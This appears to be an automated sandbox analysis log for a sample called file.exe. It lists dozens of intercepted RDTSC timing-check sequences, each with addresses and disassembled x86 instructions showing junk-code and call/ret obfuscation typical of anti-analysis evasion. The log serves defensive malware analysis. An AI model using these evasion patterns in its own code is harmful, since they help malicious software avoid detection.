              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524FFD second address: 525014 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 jbe 00007F2B9CB0EC14h 0x0000000e pushad 0x0000000f jnc 00007F2B9CB0EC06h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525014 second address: 525025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525370 second address: 525376 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525376 second address: 52537A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525636 second address: 525643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jc 00007F2B9CB0EC0Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525643 second address: 52565C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007F2B9CBCE6ADh 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525A15 second address: 525A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F2B9CB0EC08h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525A26 second address: 525A2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525A2B second address: 525A31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525AA8 second address: 525AAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525B9C second address: 525BA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525BA2 second address: 525BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525BA6 second address: 525BAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525EF6 second address: 525EFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525EFC second address: 525F00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525F00 second address: 525F12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F2B9CBCE6A6h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525F12 second address: 525F33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CB0EC19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525F33 second address: 525F37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525F37 second address: 525F3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 526E40 second address: 526E44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 526E44 second address: 526E5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CB0EC15h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 526E5D second address: 526E63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 528C18 second address: 528C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 528C1C second address: 528C22 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 528C22 second address: 528C64 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2B9CB0EC13h 0x00000008 jmp 00007F2B9CB0EC0Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 call 00007F2B9CB0EC0Bh 0x00000019 push edx 0x0000001a mov edi, 57B28205h 0x0000001f pop edi 0x00000020 pop edi 0x00000021 push 00000000h 0x00000023 mov edi, dword ptr [ebp+122D3804h] 0x00000029 xchg eax, ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c je 00007F2B9CB0EC0Ch 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 528C64 second address: 528C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52972E second address: 529732 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 529732 second address: 5297C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F2B9CBCE6B3h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F2B9CBCE6A8h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 push 00000000h 0x0000002a add dword ptr [ebp+122D33F3h], edi 0x00000030 push 00000000h 0x00000032 xchg eax, ebx 0x00000033 pushad 0x00000034 jp 00007F2B9CBCE6BCh 0x0000003a jmp 00007F2B9CBCE6B6h 0x0000003f jmp 00007F2B9CBCE6B4h 0x00000044 popad 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F2B9CBCE6B8h 0x0000004f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 529496 second address: 5294B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F2B9CB0EC18h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5297C8 second address: 5297CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5297CE second address: 5297D3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A2A7 second address: 52A2B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F2B9CBCE6A6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A2B1 second address: 52A324 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+122D37E2h], edx 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F2B9CB0EC08h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000017h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d xor dword ptr [ebp+122D35B5h], edi 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 call 00007F2B9CB0EC08h 0x0000003d pop eax 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 add dword ptr [esp+04h], 0000001Bh 0x0000004a inc eax 0x0000004b push eax 0x0000004c ret 0x0000004d pop eax 0x0000004e ret 0x0000004f sbb di, AC3Fh 0x00000054 mov edi, dword ptr [ebp+122D3103h] 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f jne 00007F2B9CB0EC06h 0x00000065 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A324 second address: 52A341 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CBCE6B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A341 second address: 52A359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2B9CB0EC14h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52AD36 second address: 52AD3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52AA75 second address: 52AA7F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2B9CB0EC06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52AD3A second address: 52AD7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a sbb edi, 72BEB172h 0x00000010 push 00000000h 0x00000012 mov di, DD00h 0x00000016 movsx esi, ax 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007F2B9CBCE6A8h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 00000017h 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 xchg eax, ebx 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52AA7F second address: 52AA85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52AD7A second address: 52AD7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52AA85 second address: 52AA89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52AD7E second address: 52AD88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52AD88 second address: 52AD8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52AD8C second address: 52ADAC instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2B9CBCE6A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jbe 00007F2B9CBCE6BEh 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F2B9CBCE6ACh 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B847 second address: 52B861 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2B9CB0EC16h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B861 second address: 52B8C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CBCE6B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F2B9CBCE6A8h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 push 00000000h 0x0000002a mov si, bx 0x0000002d push 00000000h 0x0000002f xchg eax, ebx 0x00000030 jmp 00007F2B9CBCE6B7h 0x00000035 push eax 0x00000036 push esi 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D322 second address: 52D328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D328 second address: 52D32C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D32C second address: 52D343 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CB0EC13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531F8F second address: 531FA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 jnl 00007F2B9CBCE6A6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532763 second address: 532767 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532767 second address: 532771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534564 second address: 53456E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2B9CB0EC0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53456E second address: 534582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2B9CBCE6ABh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534582 second address: 53460B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CB0EC11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a movzx ebx, ax 0x0000000d push esi 0x0000000e push edx 0x0000000f mov dword ptr [ebp+122D32F5h], ebx 0x00000015 pop ebx 0x00000016 pop edi 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007F2B9CB0EC08h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 0000001Ah 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 mov edi, dword ptr [ebp+122D302Bh] 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push ebp 0x0000003e call 00007F2B9CB0EC08h 0x00000043 pop ebp 0x00000044 mov dword ptr [esp+04h], ebp 0x00000048 add dword ptr [esp+04h], 00000018h 0x00000050 inc ebp 0x00000051 push ebp 0x00000052 ret 0x00000053 pop ebp 0x00000054 ret 0x00000055 jmp 00007F2B9CB0EC13h 0x0000005a xchg eax, esi 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 popad 0x00000061 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53460B second address: 534611 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532771 second address: 5327F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F2B9CB0EC08h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 mov edi, dword ptr [ebp+122D3975h] 0x00000028 push dword ptr fs:[00000000h] 0x0000002f mov dword ptr [ebp+122DBBE7h], edi 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c xor bh, FFFFFF80h 0x0000003f mov eax, dword ptr [ebp+122D0421h] 0x00000045 mov dword ptr [ebp+1247F3C3h], esi 0x0000004b push FFFFFFFFh 0x0000004d push 00000000h 0x0000004f push ebp 0x00000050 call 00007F2B9CB0EC08h 0x00000055 pop ebp 0x00000056 mov dword ptr [esp+04h], ebp 0x0000005a add dword ptr [esp+04h], 0000001Ah 0x00000062 inc ebp 0x00000063 push ebp 0x00000064 ret 0x00000065 pop ebp 0x00000066 ret 0x00000067 jne 00007F2B9CB0EC0Ch 0x0000006d push eax 0x0000006e push eax 0x0000006f push edx 0x00000070 push eax 0x00000071 pushad 0x00000072 popad 0x00000073 pop eax 0x00000074 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5337C9 second address: 5337D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53651B second address: 536526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536526 second address: 53652A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53652A second address: 5365DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CB0EC0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jc 00007F2B9CB0EC1Dh 0x00000011 jng 00007F2B9CB0EC17h 0x00000017 jmp 00007F2B9CB0EC11h 0x0000001c nop 0x0000001d jl 00007F2B9CB0EC0Ch 0x00000023 sub dword ptr [ebp+1246C049h], ebx 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e call 00007F2B9CB0EC08h 0x00000033 pop esi 0x00000034 mov dword ptr [esp+04h], esi 0x00000038 add dword ptr [esp+04h], 0000001Bh 0x00000040 inc esi 0x00000041 push esi 0x00000042 ret 0x00000043 pop esi 0x00000044 ret 0x00000045 mov edi, ecx 0x00000047 mov dword ptr [ebp+122D17F6h], ebx 0x0000004d push 00000000h 0x0000004f push 00000000h 0x00000051 push ebp 0x00000052 call 00007F2B9CB0EC08h 0x00000057 pop ebp 0x00000058 mov dword ptr [esp+04h], ebp 0x0000005c add dword ptr [esp+04h], 0000001Bh 0x00000064 inc ebp 0x00000065 push ebp 0x00000066 ret 0x00000067 pop ebp 0x00000068 ret 0x00000069 jmp 00007F2B9CB0EC0Bh 0x0000006e mov dword ptr [ebp+122DBC18h], edi 0x00000074 sub ebx, dword ptr [ebp+122D2BF5h] 0x0000007a xchg eax, esi 0x0000007b push eax 0x0000007c push edx 0x0000007d push eax 0x0000007e jno 00007F2B9CB0EC06h 0x00000084 pop eax 0x00000085 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53388C second address: 533899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jng 00007F2B9CBCE6ACh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534763 second address: 534777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B9CB0EC0Fh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534777 second address: 534781 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2B9CBCE6ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5366F5 second address: 5366FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F2B9CB0EC06h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53AC46 second address: 53AC61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F2B9CBCE6A6h 0x0000000a popad 0x0000000b push ebx 0x0000000c jns 00007F2B9CBCE6A6h 0x00000012 pop ebx 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53AC61 second address: 53AC65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53AC65 second address: 53AC6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5357DD second address: 5357E2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53CAB3 second address: 53CB0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 pushad 0x00000007 jmp 00007F2B9CBCE6ACh 0x0000000c push ecx 0x0000000d jnl 00007F2B9CBCE6A6h 0x00000013 pop ecx 0x00000014 popad 0x00000015 nop 0x00000016 adc edi, 31FF4FF7h 0x0000001c push 00000000h 0x0000001e mov dword ptr [ebp+122D1B9Bh], ebx 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ecx 0x00000029 call 00007F2B9CBCE6A8h 0x0000002e pop ecx 0x0000002f mov dword ptr [esp+04h], ecx 0x00000033 add dword ptr [esp+04h], 0000001Dh 0x0000003b inc ecx 0x0000003c push ecx 0x0000003d ret 0x0000003e pop ecx 0x0000003f ret 0x00000040 xchg eax, esi 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 jp 00007F2B9CBCE6A6h 0x0000004a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53CB0F second address: 53CB13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53AE2E second address: 53AE34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53AE34 second address: 53AE3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F2B9CB0EC06h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53DB7E second address: 53DB82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53DB82 second address: 53DB88 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53DB88 second address: 53DB97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2B9CBCE6ABh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53DB97 second address: 53DB9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53BCCF second address: 53BCD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53EBC7 second address: 53EBCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53BCD4 second address: 53BCF6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F2B9CBCE6B6h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53EBCD second address: 53EBD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53BCF6 second address: 53BCFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
